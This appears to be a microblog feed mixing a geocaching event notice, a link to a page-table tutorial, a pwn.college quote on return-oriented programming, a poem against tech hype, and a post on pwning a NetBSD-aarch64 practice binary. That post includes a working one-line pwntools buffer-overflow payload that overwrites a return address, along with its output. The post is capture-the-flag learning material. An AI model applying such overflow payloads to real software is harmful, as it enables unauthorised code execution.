Save the date: ibug 2026 - 10-jähriges Jubiläum:
Sa 22.08.2026: 10:00 Geocaching-Event:
ibug 2026 (GCBKXVZ), 03525 Riesa
Event-Publish erfolgt reichtzeitig. Fühlt euch eingeladen!
Save the date: ibug 2026 - 10-jähriges Jubiläum:
Sa 22.08.2026: 10:00 Geocaching-Event:
ibug 2026 (GCBKXVZ), 03525 Riesa
Event-Publish erfolgt reichtzeitig. Fühlt euch eingeladen!
A very detailed tutorial from "Joaquin Pinillos"
Walk x86-64 page tables by hand in qemu and gdb. Decompose a virtual address, follow cr3 through all levels of physical memory, and extract a flag from raw bytes.
State of the art AI in 2026 :-)
pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
This afternoon's fun: pwning NetBSD-aarch64 (ARM)
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf
Testdriving NetBSD-11.0RC2 on ARM hardware (in VM!)
„Picture yourself as a digital maestro, orchestrating a symphony of code in a vast digital realm. However, there’s a twist: you don’t get to pen down your own notes. Instead, you're given a legacy of existing code snippets, scattered across the system. This is the essence of Return Oriented Programming (ROP) exploits!“ (pwn.college)
#rop #returnorientedprogramming #pwn #ctf #cybersecurity #pwncollege
I don't want a city on Mars.
I don't want AI in every app.
I don't want data centres in space.
I want clean water.
I want a stable climate.
I want bees to survive.